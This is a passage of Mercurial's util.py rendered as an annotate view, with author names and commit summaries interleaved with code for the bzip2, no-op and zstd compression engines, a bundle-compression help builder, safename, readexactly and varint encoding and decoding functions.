r30761 # We declare a protocol name but don't advertise by default because
# it is slow.
def wireprotosupport(self):
return compewireprotosupport('bzip2', 0, 0)
Gregory Szorc
util: add a stream compression API to compression engines...
r30356 def compressstream(self, it, opts=None):
opts = opts or {}
z = bz2.BZ2Compressor(opts.get('level', 9))
for chunk in it:
data = z.compress(chunk)
if data:
yield data
yield z.flush()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 def decompressorreader(self, fh):
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 return _BZ2CompressedStreamReader(fh)
Gregory Szorc
util: create new abstraction for compression engines...
r30350
compengines.register(_bz2engine())
class _truncatedbz2engine(compressionengine):
def name(self):
return 'bz2truncated'
def bundletype(self):
return None, '_truncatedBZ'
Gregory Szorc
util: remove compressorobj API from compression engines...
r30359 # We don't implement compressstream because it is hackily handled elsewhere.
Gregory Szorc
util: create new abstraction for compression engines...
r30350
def decompressorreader(self, fh):
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 return _TruncatedBZ2CompressedStreamReader(fh)
Gregory Szorc
util: create new abstraction for compression engines...
r30350
compengines.register(_truncatedbz2engine())
Gregory Szorc
util: put compression code next to each other...
r30265
Gregory Szorc
util: create new abstraction for compression engines...
r30350 class _noopengine(compressionengine):
def name(self):
return 'none'
def bundletype(self):
Gregory Szorc
util: document bundle compression...
r31792 """No compression is performed.
Use this compression engine to explicitly disable compression.
"""
Gregory Szorc
util: create new abstraction for compression engines...
r30350 return 'none', 'UN'
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 # Clients always support uncompressed payloads. Servers don't because
# unless you are on a fast network, uncompressed payloads can easily
# saturate your network pipe.
def wireprotosupport(self):
return compewireprotosupport('none', 0, 10)
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 # We don't implement revlogheader because it is handled specially
# in the revlog class.
Gregory Szorc
util: add a stream compression API to compression engines...
r30356 def compressstream(self, it, opts=None):
return it
Gregory Szorc
util: create new abstraction for compression engines...
r30350 def decompressorreader(self, fh):
return fh
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 class nooprevlogcompressor(object):
def compress(self, data):
return None
def revlogcompressor(self, opts=None):
return self.nooprevlogcompressor()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines.register(_noopengine())
Pierre-Yves David
changegroup: move all compressions utilities in util...
r26266
Gregory Szorc
util: implement zstd compression engine...
r30442 class _zstdengine(compressionengine):
def name(self):
return 'zstd'
@propertycache
def _module(self):
# Not all installs have the zstd module available. So defer importing
# until first access.
try:
from . import zstd
# Force delayed import.
zstd.__version__
return zstd
except ImportError:
return None
def available(self):
return bool(self._module)
def bundletype(self):
Gregory Szorc
util: document bundle compression...
r31792 """A modern compression algorithm that is fast and highly flexible.
Only supported by Mercurial 4.1 and newer clients.
With the default settings, zstd compression is both faster and yields
better compression than ``gzip``. It also frequently yields better
compression than ``bzip2`` while operating at much higher speeds.
If this engine is available and backwards compatibility is not a
concern, it is likely the best available engine.
"""
Gregory Szorc
util: implement zstd compression engine...
r30442 return 'zstd', 'ZS'
Gregory Szorc
util: declare wire protocol support of compression engines...
r30761 def wireprotosupport(self):
return compewireprotosupport('zstd', 50, 50)
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def revlogheader(self):
return '\x28'
Gregory Szorc
util: implement zstd compression engine...
r30442 def compressstream(self, it, opts=None):
opts = opts or {}
# zstd level 3 is almost always significantly faster than zlib
# while providing no worse compression. It strikes a good balance
# between speed and compression.
level = opts.get('level', 3)
zstd = self._module
z = zstd.ZstdCompressor(level=level).compressobj()
for chunk in it:
data = z.compress(chunk)
if data:
yield data
yield z.flush()
def decompressorreader(self, fh):
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 return _ZstdCompressedStreamReader(fh, self._module)
Gregory Szorc
util: implement zstd compression engine...
r30442
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 class zstdrevlogcompressor(object):
def __init__(self, zstd, level=3):
Gregory Szorc
util: drop write_content_size=True...
r37514 # TODO consider omitting frame magic to save 4 bytes.
# This writes content sizes into the frame header. That is
# extra storage. But it allows a correct size memory allocation
# to hold the result.
self._cctx = zstd.ZstdCompressor(level=level)
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 self._dctx = zstd.ZstdDecompressor()
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
Gregory Szorc
util: compression APIs to support revlog compression...
r30794
def compress(self, data):
insize = len(data)
# Caller handles empty input case.
assert insize > 0
if insize < 50:
return None
elif insize <= 1000000:
compressed = self._cctx.compress(data)
if len(compressed) < insize:
return compressed
return None
else:
z = self._cctx.compressobj()
chunks = []
pos = 0
while pos < insize:
pos2 = pos + self._compinsize
chunk = z.compress(data[pos:pos2])
if chunk:
chunks.append(chunk)
pos = pos2
chunks.append(z.flush())
if sum(map(len, chunks)) < insize:
return ''.join(chunks)
return None
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798 def decompress(self, data):
insize = len(data)
try:
# This was measured to be faster than other streaming
# decompressors.
dobj = self._dctx.decompressobj()
chunks = []
pos = 0
while pos < insize:
pos2 = pos + self._decompinsize
chunk = dobj.decompress(data[pos:pos2])
if chunk:
chunks.append(chunk)
pos = pos2
# Frame should be exhausted, so no finish() API.
return ''.join(chunks)
except Exception as e:
Gregory Szorc
global: replace most uses of RevlogError with StorageError (API)...
r39813 raise error.StorageError(_('revlog decompress error: %s') %
stringutil.forcebytestr(e))
Gregory Szorc
util: compression APIs to support revlog decompression...
r30798
Gregory Szorc
util: compression APIs to support revlog compression...
r30794 def revlogcompressor(self, opts=None):
opts = opts or {}
return self.zstdrevlogcompressor(self._module,
level=opts.get('level', 3))
Gregory Szorc
util: implement zstd compression engine...
r30442 compengines.register(_zstdengine())
Gregory Szorc
util: document bundle compression...
r31792 def bundlecompressiontopics():
"""Obtains a list of available bundle compressions for use in help."""
# help.makeitemsdocs() expects a dict of names to items with a .__doc__.
items = {}
# We need to format the docstring. So use a dummy object/type to hold it
# rather than mutating the original.
class docobject(object):
pass
for name in compengines:
engine = compengines[name]
if not engine.available():
continue
bt = engine.bundletype()
if not bt or not bt[0]:
continue
Yuya Nishihara
py3: build help of compression engines in bytes...
r40287 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
Gregory Szorc
util: document bundle compression...
r31792
value = docobject()
Yuya Nishihara
py3: build help of compression engines in bytes...
r40287 value.__doc__ = pycompat.sysstr(doc)
FUJIWARA Katsunori
i18n: use saved object to get actual function information if available...
r33817 value._origdoc = engine.bundletype.__doc__
value._origfunc = engine.bundletype
Gregory Szorc
util: document bundle compression...
r31792
items[bt[0]] = value
return items
FUJIWARA Katsunori
i18n: get translation entries for description of each compression engines...
r33819 i18nfunctions = bundlecompressiontopics().values()
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244 # convenient shortcut
dst = debugstacktrace
Mark Thomas
util: add safename function for generating safe names to rename to...
r34555
def safename(f, tag, ctx, others=None):
"""
Generate a name that it is safe to rename f to in the given context.
f: filename to rename
tag: a string tag that will be included in the new name
ctx: a context, in which the new name must not exist
others: a set of other filenames that the new name must not be in
Returns a file name of the form oldname~tag[~number] which does not exist
in the provided context and is not in the set of other names.
"""
if others is None:
others = set()
fn = '%s~%s' % (f, tag)
if fn not in ctx and fn not in others:
return fn
for n in itertools.count(1):
fn = '%s~%s~%s' % (f, tag, n)
if fn not in ctx and fn not in others:
return fn
Boris Feld
util: move 'readexactly' in the util module...
r35772
def readexactly(stream, n):
'''read n bytes from stream.read and abort if less was available'''
s = stream.read(n)
if len(s) < n:
raise error.Abort(_("stream ended unexpectedly"
" (got %d bytes, expected %d)")
% (len(s), n))
return s
Gregory Szorc
util: implement varint functions...
r35773
def uvarintencode(value):
"""Encode an unsigned integer value to a varint.
A varint is a variable length integer of 1 or more bytes. Each byte
except the last has the most significant bit set. The lower 7 bits of
each byte store the 2's complement representation, least significant group
first.
>>> uvarintencode(0)
'\\x00'
>>> uvarintencode(1)
'\\x01'
>>> uvarintencode(127)
'\\x7f'
>>> uvarintencode(1337)
'\\xb9\\n'
>>> uvarintencode(65536)
'\\x80\\x80\\x04'
>>> uvarintencode(-1)
Traceback (most recent call last):
...
ProgrammingError: negative value for uvarint: -1
"""
if value < 0:
raise error.ProgrammingError('negative value for uvarint: %d'
% value)
bits = value & 0x7f
value >>= 7
bytes = []
while value:
bytes.append(pycompat.bytechr(0x80 | bits))
bits = value & 0x7f
value >>= 7
bytes.append(pycompat.bytechr(bits))
return ''.join(bytes)
def uvarintdecodestream(fh):
"""Decode an unsigned variable length integer from a stream.
The passed argument is anything that has a ``.read(N)`` method.
>>> try:
... from StringIO import StringIO as BytesIO
... except ImportError:
... from io import BytesIO
>>> uvarintdecodestream(BytesIO(b'\\x00'))
0
>>> uvarintdecodestream(BytesIO(b'\\x01'))
1
>>> uvarintdecodestream(BytesIO(b'\\x7f'))
127
>>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
1337
>>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
65536
>>> uvarintdecodestream(BytesIO(b'\\x80'))
Traceback (most recent call last):
...
Abort: stream ended unexpectedly (got 0 bytes, expected 1)
"""
result = 0
shift = 0
while True:
byte = ord(readexactly(fh, 1))
result |= ((byte & 0x7f) << shift)
if not (byte & 0x80):
return result
shift += 7